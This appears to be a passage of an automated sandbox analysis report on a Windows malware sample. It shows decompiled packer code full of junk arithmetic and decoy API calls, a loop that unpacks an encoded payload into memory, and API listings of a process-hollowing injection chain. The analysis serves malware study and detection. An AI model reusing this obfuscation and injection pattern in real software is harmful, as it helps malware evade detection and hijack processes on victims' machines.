                      				_v144 = _v144 + 0x59c55b6e;
                      				_v144 = _v144 + 0x3e4b2e5f;
                      				_v144 = _v144 - 0x533debbd;
                      				_v76 = _v76 - 0x4694b7b0;
                      				_v108 = _v108 + 0x64d2b886;
                      				_v144 = _v144 + 0x24a8487e;
                      				_v108 = _v108 + 0x346d58dd;
                      				_v76 = _v76 - 0x41db75c6;
                      				_v108 = _v108 + 0x6d280e28;
                      				_v108 = _v108 - 0x7da0931;
                      				_v76 = _v76 + 0x694bfc10;
                      				_v108 = _v108 - 0xc4a1537;
                      				_v76 = _v76 - 0x37c54368;
                      				_v144 = _v144 - 0x2c7f8551;
                      				_v76 = _v76 - 0x3fa9e949;
                      				_v108 = _v108 + 0x791148db;
                      				_v108 = _v108 + 0x138bf3c6;
                      				_v144 = _v144 - 0x61a2b58f;
                      				_v108 = _v108 - 0x208df69e;
                      				_v144 = _v144 - 0x497a7bc8;
                      				_v108 = _v108 - 0x1af05f9e;
                      				_v108 = _v108 - 0x6b3af13b;
                      				_v144 = _v144 + 0x6fb1c642;
                      				_v108 = _v108 - 0x994df12;
                      				_v76 = _v76 - 0x7867e843;
                      				_v88 = _v88 + 0x45a20138;
                      				_v144 = _v144 - 0x4d6b8727;
                      				_v144 = _v144 + 0x42d16f3c;
                      				_v144 = _v144 - 0x4aaeb358;
                      				_v144 = _v144 - 0x5c1aa042;
                      				_v152 = _v152 + 0x49af1289;
                      				_v144 = _v144 + 0x437c985f;
                      				_v108 = _v108 + 0x79b9c2a2;
                      				_v56 = _v56 + 0x5b4a1592;
                      				_v88 = _v88 - 0x2ec83452;
                      				_v144 = _v144 + 0x437869a5;
                      				_v64 = _v64 + 0x3b025366;
                      				_v88 = _v88 - 0xd43d2d;
                      				_v76 = _v76 + 0x7d747d8a;
                      				_v104 = _v104 + 0x4883c890;
                      				_v152 = _v152 + 0x289bc367;
                      				_v76 = _v76 + 0x798c77cb;
                      				_v76 = _v76 - 0x56be1fbb;
                      				_v92 = _v92 + 0xdf5b30d;
                      				_v92 = _v92 + 0x37ed99c9;
                      				_v56 = _v56 - 0x7715dacd;
                      				_v88 = _v88 - 0x31376674;
                      				_v124 = _v124 - 0x636d4c79;
                      				_v76 = _v76 + 0x35025f94;
                      				_v76 = _v76 + 0x6e30b30b;
                      				_v64 = _v64 + 0x14dc745e;
                      				_v68 = _v68 - 0x169f63ef;
                      				_v76 = _v76 + 0x7c02df99;
                      				_v56 = _v56 - 0x2e59662f;
                      				_v92 = _v92 + 0x155c59a4;
                      				_v56 = _v56 + 0x7b75a504;
                      				_v112 = _v112 + 0x219f47f3;
                      				_v92 = _v92 - 0x67a552b;
                      				_v108 = _v108 + 0x4a2137a8;
                      				_v68 = _v68 + 0xc585413;
                      				_v88 = _v88 - 0x3a14e483;
                      				_v144 = _v144 + 0x5b524b4e;
                      				_v60 = _v60 + 0x34fb5402;
                      				_v92 = _v92 - 0x34bffa78;
                      				_v124 = _v124 + 0x6aa55f44;
                      				_v76 = _v76 + 0xf4e48f;
                      				_v104 = _v104 - 0x2cd6d396;
                      				_v88 = _v88 - 0x45adcf56;
                      				_v112 = _v112 + 0x46ab1204;
                      				_v112 = _v112 - 0x2d00c364;
                      				_v68 = _v68 + 0x7599e045;
                      				_v88 = _v88 + 0x74eabc8d;
                      				_v112 = _v112 + 0x7bf0b077;
                      				_v88 = _v88 + 0x5b716b01;
                      				_v104 = _v104 - 0x4d38819a;
                      				_v108 = _v108 + 0x278eda90;
                      				_v60 = _v60 + 0x1f444cf3;
                      				_v60 = _v60 + 0x1092cade;
                      				_v96 = _v96 + 0x3a66ef6d;
                      				_v88 = _v88 - 0x6fe2cb96;
                      				_v108 = _v108 - 0x173e588a;
                      				_v108 = _v108 + 0x27245b35;
                      				_v120 = _v120 + 0x441a636b;
                      				_v60 = _v60 + 0x5ba43329;
                      				_v164 = _v164 + 0x2901033c;
                      				_v128 = _v128 + 0x7b88cf48;
                      				_v76 = _v76 + 0x67a8963c;
                      				_v144 = _v144 - 0x7d8997bf;
                      				_v104 = _v104 - 0x626ab517;
                      				_v112 = _v112 + 0x36ad816d;
                      				_v88 = _v88 + 0x74cb5282;
                      				_v92 = _v92 - 0x7230715d;
                      				_v152 = _v152 - 0x597545ed;
                      				_v164 = _v164 - 0x3ec80e96;
                      				_v108 = _v108 - 0x7fd0260;
                      				_v140 = _v140 - 0x25000d89;
                      				_v164 = _v164 + 0x17d0d6ee;
                      				_v96 = _v96 - 0x538210b7;
                      				_v108 = _v108 - 0x233dd73b;
                      				_v100 = _v100 + 0x30220508;
                      				_v76 = _v76 - 0x1cee596;
                      				_v92 = _v92 - 0x2b0a7c88;
                      				_v128 = _v128 + 0x4ff17690;
                      				_v68 = _v68 - 0xaf71342;
                      				_v92 = _v92 + 0x7ef27e15;
                      				_v156 = _v156 + 0x47928b6b;
                      				_v108 = _v108 - 0x2c14997d;
                      				_v64 = _v64 + 0xa689404;
                      				_v156 = _v156 - 0xc7d2fed;
                      				_v60 = _v60 + 0x7d990335;
                      				_v156 = _v156 + 0x77640fe7;
                      				_v108 = _v108 + 0x76cee0ec;
                      				_v100 = _v100 - 0x8ece03b;
                      				_v56 = _v56 - 0x2b84348d;
                      				_v64 = _v64 - 0x64f9c0f;
                      				_v108 = _v108 - 0x8418f68;
                      				_v68 = _v68 - 0x3ab9c933;
                      				_v92 = _v92 + 0x32b4df14;
                      				_v60 = _v60 + 0x189e08f;
                      				_v60 = _v60 - 0x2cd1dbee;
                      				_v140 = _v140 + 0x7639de4a;
                      				_v144 = _v144 - 0x2f37c91f;
                      				_v116 = _v116 - 0x2bb22a2d;
                      				_v164 = _v164 + 0x6e49c677;
                      				_v160 = _v160 + 0x159d10e0;
                      				_v116 = _v116 + 0x3441d489;
                      				_v128 = _v128 - 0x83f7a80;
                      				_v108 = _v108 + 0x48b5e129;
                      				_v136 = _v136 + 0x56402792;
                      				_v124 = _v124 + 0xbc9365a;
                      				_v92 = _v92 + 0x421015e;
                      				_v168 = _v168 - 0x1e00592f;
                      				_v68 = _v68 - 0x15ce5b3f;
                      				_v68 = _v68 + 0x78fb057a;
                      				_v136 = _v136 - 0x67ec879;
                      				_v80 = _v80 - 0x1bf010b5;
                      				_v68 = _v68 - 0x6f1a8863;
                      				_v144 = _v144 - 0x2898aad2;
                      				_v84 = _v84 - 0x1e9953fd;
                      				_v116 = _v116 + 0x169c25d;
                      				_v96 = _v96 + 0x65ce6471;
                      				_v128 = _v128 + 0x4d7a962f;
                      				_v104 = _v104 - 0x21834542;
                      				_v96 = _v96 + 0x3832462b;
                      				_v72 = _v72 - 0x3743ab43;
                      				_v104 = _v104 + 0x3438b52a;
                      				_v160 = _v160 + 0x387092fa;
                      				_v64 = _v64 - 0x4cde04ab;
                      				_v148 = _v148 - 0x6a02c50f;
                      				_v96 = _v96 + 0x52975e55;
                      				_v160 = _v160 + 0x16ccda85;
                      				_v60 = _v60 - 0x721ba79a;
                      				_v152 = _v152 + 0x3cb8b521;
                      				_v148 = _v148 - 0x2772cc43;
                      				_v112 = _v112 + 0x83387bf;
                      				_v132 = _v132 + 0x530a5665;
                      				_t409 =  *0x445044 - 0x20;
                      				if( *0x445044 == 0x20) {
                      					WriteConsoleA(0, 0, 0,  &_v52, 0);
                      					__imp__IsProcessInJob(0, 0, 0);
                      					GetPriorityClass(0);
                      					_push("pumitafoto");
                      					_push(0);
                      					E00406707(_t387, _t395, _t397, 0, _t409);
                      					_pop(_t390);
                      					E00405FD6( &_v60, _t390);
                      					_push(0);
                      					_v20 = 0;
                      					E0040617D();
                      					E0040625A(_t387, _t397, 0);
                      					_push(0x38);
                      					_push(0);
                      					_push("%s %c");
                      					_push("msimg32.dll");
                      					E00406642(_t387, _t395, _t397, 0, _t409);
                      					E004065EF(_t387, 0, "0.txt", "rb");
                      					_t406 = _t405 + 0x1c;
                      					_push(0);
                      					E004064AE(_t387, _t397, 0, _t409);
                      					_push(0);
                      					_push(0);
                      					_push(0);
                      					E00406B33(_t387, _t395, _t397, 0, _t409);
                      					_pop(_t394);
                      					_t381 = _t406;
                      					 *_t381 = 0;
                      					 *((intOrPtr*)(_t381 + 4)) = 0;
                      					E00404B2A(__fp0);
                      					st0 = _t412;
                      					E0040694A(_t387, _t395, _t397, 0, _t409);
                      					_t384 = _t406;
                      					 *_t384 = 0;
                      					 *((intOrPtr*)(_t384 + 4)) = 0;
                      					E00404B07(_t412, _t394, 0);
                      					st0 = _t412;
                      					_v36 = _v36 | 0xffffffff;
                      					E00405FF3();
                      				}
                      				LoadLibraryA("kernel32.dll");
                      				_t365 =  *0x42e60c; // 0xfff61875
                      				 *0x445044 = _t365;
                      				 *0x445048 =  *0x42d66c; // executed
                      				E00404EC6(); // executed
                      				 *[fs:0x0] = _v16;
                      				return 0;
                      			}




















































                      0x004058a1
                      0x004058a4
                      0x004058ad
                      0x004058af
                      0x004058b4
                      0x004058b5
                      0x004058bc
                      0x004058c4
                      0x004058cb
                      0x004058cb
                      0x004058d8
                      0x004058de
                      0x004058de
                      0x004058e1
                      0x004058e9
                      0x004058f1
                      0x004058f9
                      0x00405901
                      0x00405909
                      0x00405911
                      0x00405919
                      0x00405921
                      0x00405929
                      0x00405931
                      0x00405939
                      0x00405941
                      0x00405949
                      0x00405951
                      0x00405959
                      0x00405961
                      0x00405969
                      0x00405971
                      0x00405979
                      0x00405981
                      0x00405989
                      0x00405991
                      0x00405999
                      0x004059a1
                      0x004059a9
                      0x004059b1
                      0x004059b9
                      0x004059c1
                      0x004059c9
                      0x004059d1
                      0x004059d9
                      0x004059e1
                      0x004059e9
                      0x004059f1
                      0x004059f9
                      0x00405a01
                      0x00405a09
                      0x00405a11
                      0x00405a19
                      0x00405a21
                      0x00405a29
                      0x00405a31
                      0x00405a39
                      0x00405a41
                      0x00405a49
                      0x00405a51
                      0x00405a59
                      0x00405a61
                      0x00405a69
                      0x00405a71
                      0x00405a79
                      0x00405a81
                      0x00405a89
                      0x00405a91
                      0x00405a99
                      0x00405aa1
                      0x00405aa9
                      0x00405ab1
                      0x00405ab9
                      0x00405ac1
                      0x00405ac9
                      0x00405ad1
                      0x00405ad9
                      0x00405ae1
                      0x00405ae9
                      0x00405af1
                      0x00405af9
                      0x00405b01
                      0x00405b09
                      0x00405b11
                      0x00405b19
                      0x00405b21
                      0x00405b29
                      0x00405b31
                      0x00405b39
                      0x00405b41
                      0x00405b49
                      0x00405b51
                      0x00405b59
                      0x00405b61
                      0x00405b69
                      0x00405b71
                      0x00405b79
                      0x00405b81
                      0x00405b89
                      0x00405b91
                      0x00405b99
                      0x00405ba1
                      0x00405ba9
                      0x00405bb1
                      0x00405bb9
                      0x00405bc1
                      0x00405bc9
                      0x00405bd1
                      0x00405bd9
                      0x00405be1
                      0x00405be9
                      0x00405bf1
                      0x00405bf9
                      0x00405c01
                      0x00405c09
                      0x00405c11
                      0x00405c19
                      0x00405c21
                      0x00405c29
                      0x00405c31
                      0x00405c39
                      0x00405c41
                      0x00405c49
                      0x00405c51
                      0x00405c59
                      0x00405c61
                      0x00405c69
                      0x00405c71
                      0x00405c79
                      0x00405c81
                      0x00405c89
                      0x00405c91
                      0x00405c99
                      0x00405ca1
                      0x00405ca9
                      0x00405cb1
                      0x00405cb9
                      0x00405cc1
                      0x00405cc9
                      0x00405cd1
                      0x00405cd9
                      0x00405ce1
                      0x00405ce9
                      0x00405cf1
                      0x00405cf9
                      0x00405d01
                      0x00405d09
                      0x00405d11
                      0x00405d19
                      0x00405d21
                      0x00405d29
                      0x00405d31
                      0x00405d39
                      0x00405d41
                      0x00405d49
                      0x00405d51
                      0x00405d59
                      0x00405d61
                      0x00405d69
                      0x00405d71
                      0x00405d79
                      0x00405d81
                      0x00405d89
                      0x00405d91
                      0x00405d99
                      0x00405da1
                      0x00405da9
                      0x00405db1
                      0x00405db9
                      0x00405dc1
                      0x00405dc9
                      0x00405dd1
                      0x00405dd9
                      0x00405de1
                      0x00405de9
                      0x00405df1
                      0x00405df9
                      0x00405e01
                      0x00405e09
                      0x00405e11
                      0x00405e19
                      0x00405e21
                      0x00405e29
                      0x00405e31
                      0x00405e39
                      0x00405e41
                      0x00405e49
                      0x00405e51
                      0x00405e59
                      0x00405e61
                      0x00405e69
                      0x00405e71
                      0x00405e79
                      0x00405e81
                      0x00405e89
                      0x00405e91
                      0x00405e99
                      0x00405ea1
                      0x00405ea9
                      0x00405eb1
                      0x00405eb9
                      0x00405ec1
                      0x00405ec9
                      0x00405ed1
                      0x00405ed8
                      0x00405eea
                      0x00405ef3
                      0x00405efa
                      0x00405f00
                      0x00405f05
                      0x00405f06
                      0x00405f0c
                      0x00405f14
                      0x00405f19
                      0x00405f1a
                      0x00405f21
                      0x00405f28
                      0x00405f2e
                      0x00405f30
                      0x00405f31
                      0x00405f36
                      0x00405f3b
                      0x00405f4b
                      0x00405f50
                      0x00405f53
                      0x00405f54
                      0x00405f5a
                      0x00405f5b
                      0x00405f5c
                      0x00405f5d
                      0x00405f62
                      0x00405f63
                      0x00405f65
                      0x00405f67
                      0x00405f6a
                      0x00405f6f
                      0x00405f72
                      0x00405f78
                      0x00405f7a
                      0x00405f7c
                      0x00405f7f
                      0x00405f84
                      0x00405f86
                      0x00405f95
                      0x00405f95
                      0x00405f9f
                      0x00405fa5
                      0x00405faa
                      0x00405fb4
                      0x00405fb9
                      0x00405fc8
                      0x00405fd3

                      APIs
                      • GetLastError.KERNEL32 ref: 004058CB
                      • TransactNamedPipe.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004058D8
                      • WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405EEA
                      • IsProcessInJob.KERNEL32(00000000,00000000,00000000), ref: 00405EF3
                      • GetPriorityClass.KERNEL32(00000000), ref: 00405EFA
                      • _fprintf.LIBCMT ref: 00405F06
                        • Part of subcall function 0040617D: __lock.LIBCMT ref: 0040619B
                        • Part of subcall function 0040617D: ___sbh_find_block.LIBCMT ref: 004061A6
                        • Part of subcall function 0040617D: ___sbh_free_block.LIBCMT ref: 004061B5
                        • Part of subcall function 0040617D: HeapFree.KERNEL32(00000000,00000001,00416D00,0000000C,00407651,00000000,00416E70,0000000C,0040768B,00000001,?,?,004113F5,00000004,004171A8,0000000C), ref: 004061E5
                        • Part of subcall function 0040617D: GetLastError.KERNEL32(?,004113F5,00000004,004171A8,0000000C,0040D6D2,00000001,?,00000000,00000000,00000000,?,0040BD22,00000001,00000214), ref: 004061F6
                      • _malloc.LIBCMT ref: 00405F28
                        • Part of subcall function 0040625A: __FF_MSGBANNER.LIBCMT ref: 0040627D
                        • Part of subcall function 0040625A: __NMSG_WRITE.LIBCMT ref: 00406284
                        • Part of subcall function 0040625A: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,0040D688,00000001,00000001,00000001,?,004075FA,00000018,00416E70,0000000C,0040768B), ref: 004062D1
                      • _printf.LIBCMT ref: 00405F3B
                      • __wfopen_s.LIBCMT ref: 00405F4B
                        • Part of subcall function 004064AE: _flsall.LIBCMT ref: 004064C2
                      • _fseek.LIBCMT ref: 00405F5D
                        • Part of subcall function 00404B2A: __floor_pentium4.LIBCMT ref: 00404B3C
                      • _puts.LIBCMT ref: 00405F72
                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00405F9F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.304961274.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.304953062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305007743.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305016112.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305025625.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305042313.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.305046967.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Similarity
                      • API ID: ErrorHeapLast$AllocateClassConsoleFreeLibraryLoadNamedPipePriorityProcessTransactWrite___sbh_find_block___sbh_free_block__floor_pentium4__lock__wfopen_s_flsall_fprintf_fseek_malloc_printf_puts
                      • String ID: %s %c$+F28$/Y$/fY.$0.txt$5[$'$Cgx$NKR[$]q0r$eVS$kernel32.dll$msimg32.dll$pumitafoto$tf71$yLmc$EuY
                      • API String ID: 1973602647-887915793
                      • Opcode ID: 6789779e6930368651a5cd55a363698b3a6ff1fe83027daac20c3b6513b05ffa
                      • Instruction ID: 2953b0ce3d90607498d7d7cfffa309a633b9d58c4af9c3ab6ec6c1625e5f0895
                      • Opcode Fuzzy Hash: 6789779e6930368651a5cd55a363698b3a6ff1fe83027daac20c3b6513b05ffa
                      • Instruction Fuzzy Hash: EBF134B28097809FC3A08F66C58950FFBF0BFA57A4F244A0CF29516560E7758A84CF4B
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00490156
                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0049016C
                      • CreateProcessA.KERNELBASE(?,00000000), ref: 00490255
                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00490270
                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00490283
                      • GetThreadContext.KERNELBASE(00000000,?), ref: 0049029F
                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 004902C8
                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 004902E3
                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00490304
                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0049032A
                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00490399
                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 004903BF
                      • SetThreadContext.KERNELBASE(00000000,?), ref: 004903E1
                      • ResumeThread.KERNELBASE(00000000), ref: 004903ED
                      • ExitProcess.KERNEL32(00000000), ref: 00490412
                      Memory Dump Source
                      • Source File: 00000000.00000002.305076763.0000000000490000.00000040.00001000.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_490000_file.jbxd
                      Similarity
                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                      • String ID:
                      • API String ID: 2875986403-0
                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                      • Instruction ID: 7e3f00d3d1e4368e5569b9e58593291cc15c713422d746ba91040ccbab7fe22d
                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                      • Instruction Fuzzy Hash: EFB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E909AB391D775AE41CF94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 62%
                      			E00404EC6() {
                      				void* _v6;
                      				short _v8;
                      				char _v12;
                      				long _v16;
                      				long _v20;
                      				char _v24;
                      				long _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				intOrPtr _v52;
                      				intOrPtr _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				intOrPtr _v72;
                      				intOrPtr _v76;
                      				intOrPtr _v80;
                      				intOrPtr _v84;
                      				intOrPtr _v88;
                      				intOrPtr _v92;
                      				intOrPtr _v96;
                      				intOrPtr _v100;
                      				intOrPtr _v104;
                      				intOrPtr _v108;
                      				intOrPtr _v112;
                      				intOrPtr _v116;
                      				intOrPtr _v120;
                      				intOrPtr _v124;
                      				intOrPtr _v128;
                      				intOrPtr _v132;
                      				intOrPtr _v136;
                      				intOrPtr _v140;
                      				intOrPtr _v144;
                      				intOrPtr _v148;
                      				intOrPtr _v152;
                      				intOrPtr _v156;
                      				intOrPtr _v160;
                      				intOrPtr _v164;
                      				intOrPtr _v168;
                      				intOrPtr _v172;
                      				intOrPtr _v176;
                      				intOrPtr _v180;
                      				intOrPtr _v184;
                      				intOrPtr _v188;
                      				intOrPtr _v192;
                      				intOrPtr _v196;
                      				intOrPtr _v200;
                      				intOrPtr _v204;
                      				intOrPtr _v208;
                      				intOrPtr _v212;
                      				intOrPtr _v216;
                      				intOrPtr _v220;
                      				intOrPtr _v224;
                      				intOrPtr _v228;
                      				intOrPtr _v232;
                      				intOrPtr _v236;
                      				intOrPtr _v240;
                      				intOrPtr _v244;
                      				intOrPtr _v248;
                      				intOrPtr _v252;
                      				intOrPtr _v256;
                      				intOrPtr _v260;
                      				intOrPtr _v264;
                      				intOrPtr _v268;
                      				intOrPtr _v272;
                      				intOrPtr _v276;
                      				intOrPtr _v280;
                      				intOrPtr _v284;
                      				intOrPtr _v288;
                      				intOrPtr _v292;
                      				intOrPtr _v296;
                      				intOrPtr _v300;
                      				intOrPtr _v304;
                      				intOrPtr _v308;
                      				intOrPtr _v312;
                      				intOrPtr _v316;
                      				intOrPtr _v320;
                      				intOrPtr _v324;
                      				intOrPtr _v328;
                      				intOrPtr _v332;
                      				intOrPtr _v336;
                      				struct _cpinfo _v356;
                      				char _v420;
                      				void _v1444;
                      				char _v2468;
                      				char _v4516;
                      				void* _t514;
                      				void* _t660;
                      				void* _t661;
                      				void* _t698;
                      				void* _t699;
                      				void* _t700;
                      				void* _t701;
                      
                      				E0040E260(0x11a4);
                      				if( *0x445044 == 0x412) {
                      					E0040650A(0);
                      					_push(0);
                      					E00406520();
                      					_pop(_t660);
                      					E00406E58(0);
                      				}
                      				 *0x445044 =  *0x445044 + 0xb2d3b;
                      				 *0x444e14 = GetModuleHandleW(L"kernel32.dll"); // executed
                      				_t514 = LocalAlloc(0,  *0x445044); // executed
                      				 *0x444e10 = _t514; // executed
                      				E00404E1C(_t660); // executed
                      				_t698 = 0;
                      				if( *0x445044 > 0) {
                      					do {
                      						 *((char*)( *0x444e10 + _t698)) =  *((intOrPtr*)( *0x445048 + _t698 + 0xb2d3b));
                      						if( *0x445044 == 0x292) {
                      							__imp__CreateJobObjectA(0, "kowax");
                      						}
                      						_t698 = _t698 + 1;
                      					} while (_t698 <  *0x445044);
                      				}
                      				_t699 = 0;
                      				do {
                      					if( *0x445044 + _t699 == 0x5e) {
                      						SetFileAttributesA("pawujagobovalewobukalokaw", 0);
                      						GetProfileIntW(L"hiwapikijokutopesowayuzali", L"pudecebubafafelomulawogosu", 0);
                      						GetCPInfo(0,  &_v356);
                      						FoldStringA(0, 0, 0, 0, 0);
                      						GetVolumeInformationA(0,  &_v2468, 0,  &_v28,  &_v20,  &_v16,  &_v1444, 0);
                      						__imp__OpenJobObjectW(0, 0, L"ceyizevojapaxujekoxago");
                      						__imp__GetCalendarInfoW(0, 0, 0,  &_v4516, 0,  &_v24);
                      					}
                      					_t699 = _t699 + 1;
                      				} while (_t699 < 0x40c893);
                      				_t700 = 0;
                      				while(1) {
                      					GetLastError();
                      					if(_t700 < 0x1b92e5b) {
                      						_v132 = 0x67e462f3;
                      						_v124 = 0x5af06d69;
                      						_v16 = 0x550e6073;
                      						_v116 = 0x4b56b9f1;
                      						_v104 = 0x26994589;
                      						_v252 = 0x15985316;
                      						_v120 = 0x27020532;
                      						_v296 = 0x6b9abad0;
                      						_v108 = 0x3e73eb66;
                      						_v68 = 0x7117be28;
                      						_v276 = 0x5da604f3;
                      						_v244 = 0x5f7cd3d6;
                      						_v152 = 0x46721115;
                      						_v336 = 0x1a8f0345;
                      						_v280 = 0x50cc38f8;
                      						_v304 = 0x4a848631;
                      						_v188 = 0x12e177b5;
                      						_v236 = 0x1a4215b7;
                      						_v228 = 0x3b8c8b6a;
                      						_v96 = 0x701071da;
                      						_v220 = 0x4dde9e67;
                      						_v268 = 0x2138cdcc;
                      						_v100 = 0x79e12465;
                      						_v212 = 0x162df8c2;
                      						_v64 = 0x2e27f6b9;
                      						_v180 = 0x363c5601;
                      						_v172 = 0x53842e8a;
                      						_v224 = 0x43e591ec;
                      						_v60 = 0x5eebb39e;
                      						_v52 = 0x72b95c38;
                      						_v48 = 0x2de3b1b4;
                      						_v112 = 0x190b9d4e;
                      						_v92 = 0xfe4109f;
                      						_v184 = 0x54ae7bc5;
                      						_v204 = 0x1411b51d;
                      						_v272 = 0x68c2a4e4;
                      						_v32 = 0x25db7a5;
                      						_v200 = 0x6df25c1e;
                      						_v88 = 0x58a91d;
                      						_v40 = 0x23420a38;
                      						_v144 = 0x749db312;
                      						_v288 = 0x73b9f5d5;
                      						_v260 = 0x78838e04;
                      						_v312 = 0x789f54e0;
                      						_v80 = 0x5f80cd7c;
                      						_v176 = 0x723d872f;
                      						_v84 = 0x1c20b523;
                      						_v20 = 0x39933e29;
                      						_v76 = 0x6a6cdf36;
                      						_v248 = 0x2f4182c9;
                      						_v216 = 0x6ad8ef0c;
                      						_v148 = 0x3a6c434;
                      						_v164 = 0x11c906fe;
                      						_v264 = 0x402d3c3a;
                      						_v136 = 0x52ee4d1b;
                      						_v8 = 0x347c6d6c;
                      						_v208 = 0x11b0372a;
                      						_v44 = 0x2fbc9c79;
                      						_v196 = 0x583c1114;
                      						_v332 = 0x17263a72;
                      						_v36 = 0xce8ec49;
                      						_v328 = 0x205defbb;
                      						_v12 = 0x31df762c;
                      						_v56 = 0x448f7225;
                      						_v324 = 0x3063220d;
                      						_v232 = 0x2f8d2ea5;
                      						_v128 = 0x123be14;
                      						_v28 = 0x551450a8;
                      						_v316 = 0x22150baf;
                      						_v140 = 0x5cf25b83;
                      						_v160 = 0x6950ea8;
                      						_v24 = 0x63c398fe;
                      						_v72 = 0x57b6e36;
                      						_v256 = 0x688827b4;
                      						_v308 = 0x70571416;
                      						_v192 = 0x60f034a3;
                      						_v168 = 0x7d50f5eb;
                      						_v320 = 0x78cd8b6f;
                      						_v240 = 0x1fd366fc;
                      						_v300 = 0x530f435e;
                      						_v292 = 0x28187254;
                      						_v156 = 0x360de2c2;
                      						_v284 = 0x25b3a818;
                      						_v132 = _v132 + 0x5caa67d5;
                      						_v124 = _v124 + 0x3b4ed235;
                      						_v132 = _v132 + 0x9e62a32;
                      						_v116 = _v116 - 0x8187383;
                      						_v132 = _v132 + 0x4c135ce0;
                      						_v16 = _v16 - 0x57444216;
                      						_v252 = _v252 + 0x43039132;
                      						_v252 = _v252 - 0x4703250d;
                      						_v120 = _v120 - 0x17f9cbea;
                      						_v252 = _v252 - 0x5cb4ba90;
                      						_v132 = _v132 - 0x559ddfdf;
                      						_v252 = _v252 - 0x15219df6;
                      						_v252 = _v252 + 0x2ee0da94;
                      						_v124 = _v124 + 0x179c7ebc;
                      						_v252 = _v252 - 0x6ee50c3d;
                      						_v252 = _v252 + 0x736fd115;
                      						_v108 = _v108 + 0x58ac6b3;
                      						_v124 = _v124 - 0x2461dbba;
                      						_v124 = _v124 + 0x53166a3;
                      						_v296 = _v296 + 0x6067d7d6;
                      						_v108 = _v108 - 0x3a59ed01;
                      						_v116 = _v116 + 0x502aa82c;
                      						_v68 = _v68 + 0x40c398db;
                      						_v68 = _v68 + 0x5316f79;
                      						_v276 = _v276 + 0x5e5e1713;
                      						_v336 = _v336 - 0x5012eb95;
                      						_v276 = _v276 - 0x300a3d27;
                      						_v212 = _v212 - 0x40f1be80;
                      						_v100 = _v100 + 0x51907ee;
                      						_v16 = _v16 + 0x53bf2d2;
                      						_v252 = _v252 + 0x62a7deba;
                      						_v236 = _v236 - 0x15a282bd;
                      						_v124 = _v124 + 0x750cf09;
                      						_v268 = _v268 + 0x265a1b03;
                      						_v180 = _v180 - 0x7c55df99;
                      						_v244 = _v244 + 0x5c3f5cea;
                      						_v224 = _v224 + 0x5002a5aa;
                      						_v204 = _v204 - 0x452fd972;
                      						_v100 = _v100 + 0x5a859301;
                      						_v236 = _v236 + 0x5b406f7a;
                      						_v336 = _v336 - 0x554aef4c;
                      						_v68 = _v68 - 0x3a465d9d;
                      						_v296 = _v296 - 0x56a948ad;
                      						_v116 = _v116 + 0x76502a4c;
                      						_v280 = _v280 + 0x1c3c6481;
                      						_v224 = _v224 - 0x31062905;
                      						_v304 = _v304 - 0x19570b2c;
                      						_v112 = _v112 + 0x3720702c;
                      						_v16 = _v16 - 0x324c8da1;
                      						_v108 = _v108 + 0x37f2284d;
                      						_v296 = _v296 + 0x5e4b11c3;
                      						_v172 = _v172 - 0x72ffab49;
                      						_v204 = _v204 + 0x2b31abb;
                      						_v188 = _v188 + 0x3ab7a116;
                      						_v204 = _v204 + 0x45825cdf;
                      						_v52 = _v52 + 0x3949c1ed;
                      						_v244 = _v244 + 0x4b811fea;
                      						_v32 = _v32 - 0x4f9a4dab;
                      						_v84 = _v84 + 0x749ceff;
                      						_v204 = _v204 + 0x10bffb89;
                      						_v108 = _v108 - 0x2b0f6f5f;
                      						_v236 = _v236 + 0x3365b823;
                      						_v212 = _v212 - 0x42ff9f92;
                      						_v244 = _v244 + 0x32a1e7fb;
                      						_v76 = _v76 + 0x2058b3c;
                      						_v172 = _v172 + 0x988af5a;
                      						_v144 = _v144 + 0x196202ca;
                      						_v184 = _v184 - 0x7f832484;
                      						_v268 = _v268 - 0x12652de7;
                      						_v20 = _v20 - 0xeafcb8e;
